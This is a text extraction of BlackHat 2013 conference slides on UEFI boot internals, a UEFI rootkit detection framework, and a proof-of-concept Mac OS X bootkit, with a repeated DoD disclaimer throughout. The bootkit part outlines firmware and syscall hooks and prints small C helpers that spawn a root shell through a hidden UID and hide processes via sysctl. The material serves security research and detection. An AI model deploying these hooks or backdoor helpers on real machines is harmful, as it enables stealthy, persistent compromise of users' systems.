PRESS ROOT TO PRESS ROOT TO CONTINUE: PRESS ROOT TO PRESS ROOT TO - - PowerPoint PPT Presentation
Mario Vuksan & Tomislav PericinBlackHat USA 2013, Las Vegas PRESS ROOT TO PRESS ROOT TO CONTINUE: PRESS ROOT TO PRESS ROOT TO CONTINUE: PRESS ROOT TO PRESS ROOT TO PRESS ROOT TO PRESS ROOT TO CONTINUE: CONTINUE: CONTINUE: CONTINUE:
Mario Vuksan & Tomislav PericinBlackHat USA 2013, Las Vegas
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
unified extensible firmware interface
BIOS MBR REAL MODE (16 bit)
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
NTLDR NTOSKRNL.EXE HAL SMS WIN32 KERNEL USERLAND
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
(UEFI) Forum
UEFI UEFI bootloader \EFI\Microsoft\Boot\bootmgfw.efi PROTECTED MODE
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
winload.efi NTOSKRNL.EXE HAL SMS WIN32 KERNEL USERLAND
Operating system EFI Operating system loader
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
EFI Boot services EFI runtime services Other interfaces (ACPI, SMBIOS…) Platform hardware
EFI partition
EFI Driver EFI Application EFI Boot code OS Loader
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
Platform init EFI image load EFI OS loader load Boot service terminates
Standard firmware initialization Drivers and applications loaded Boot from ordered EFIOS list Operations handed off to OS
Boot Manager EFI images
by anyone implementing the specification, e.g. TE defined by Intel and used by Apple
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
defined by Intel and used by Apple
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
calling ExitBootServices()
ExitBootServices() is called
based” and dynamically created protocols
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
based” and dynamically created protocols
ExitBootServices() is called
based” and dynamically created protocols
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
based” and dynamically created protocols
standard library
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
standard library
GCC and XCode)
/*** Print a welcoming message. Establishes the main structure of the application. @retval 0 The application exited normally. @retval Other An error occurred. ***/ INTN
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
INTN EFIAPI ShellAppMain ( IN UINTN Argc, IN CHAR16 **Argv ) { Print(L"Hello there fellow Programmer.\n"); Print(L"Welcome to the world of EDK II.\n"); return(0); }
/*** Print a welcoming message. Establishes the main structure of the application. @retval 0 The application exited normally. @retval Other An error occurred. ***/
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
***/ INTN EFIAPI UEFIAppMain ( IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable /** Boot and Runtime services **/ ) { Print(L"Hello there fellow Programmer.\n"); return(0); }
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
attacking unified extensible firmware interface
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
UEFI UEFI bootloader \EFI\Microsoft\Boot\bootmgfw.efi HOOK! HOOK!
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
winload.efi NTOSKRNL.EXE HAL SMS WIN32 KERNEL USERLAND HOOK! HOOK! CALLBACK CALLBACK
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
rootkit detection framework for uefi
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
SERVICES for modified function pointers
SERVICES while operating system is being loaded
rootkits/malware
Implementations
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
secure boot enabled)
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
drive or the USB thumb drive
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
VMWARE
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
VMWARE
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
VMWARE
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
VMWARE
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
VMWARE
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
rootkit detection framework for uefi
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
first MacOS X bootkit example
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
Mac OS X 10.7.x - Lion
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
Boot the OS from an USB thumb drive
have a MacBook Pro handy
“unofficial patch” – wink wink nudge nudge
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
EFI\boot\bootx64.efi BS->CreateEvent
EVT_SIGNAL_VIRTUAL_ADDRESS_CHANGE
UEFI Register event callback
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
SystemTable->ConIn->ReadKeyStroke HOOK! BS->OpenProtocol LoadedImage->Unload Fail safe Load Mac OS X
Load Mac OS X Enumerate drives
\System\Library\CoreServices\boot.efi
User choice on multiple OS X
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
User choice on multiple OS X instances found BS->StartImage BS->LoadImage
EVT_SIGNAL_VIRTUAL_ADDRESS_CHANGE
Locate syscall table EVENT SIGNAL
SetVirtualAddressMap()
HOOK!
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
Hook syscalls: setuid, getdirentries, getdirentriesattr & sysctl HOOK!
/*** executes shell with root rights ***/ #define HIDDEN_UID 1911
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
int main( void ) { setuid(HIDDEN_UID); system("/bin/sh"); }
/*** sends the pid to the rootkit that should be hidden ***/ int main(int argc, char *argv[]) { pid_t pid = atoi(argv[1]); printf("Adding pid %d (%08x) hide list\n", pid, pid);
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
pid_t pid = atoi(argv[1]); printf("Adding pid %d (%08x) hide list\n", pid, pid); int name[] = { CTL_ADD_PID, pid, KERN_PROC_ALL, 0 }; err = sysctl((int *)name, (sizeof(name) / sizeof(*name)) - 1, NULL, &length, NULL, 0); printf("All done, sysctl returned 0x%08x\n", err); return EXIT_SUCCESS; }
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
MacOS X bootkit
Distribution Statement “A” (Approved for Public Release, Distribution Unlimited) Disclaimer: “The views expressed are those of the author and do not reflect the official policy or position of the Department of Defense or the U.S. Government.” This is in accordance with DoDI 5230.29, January 8, 2009.
Thanks!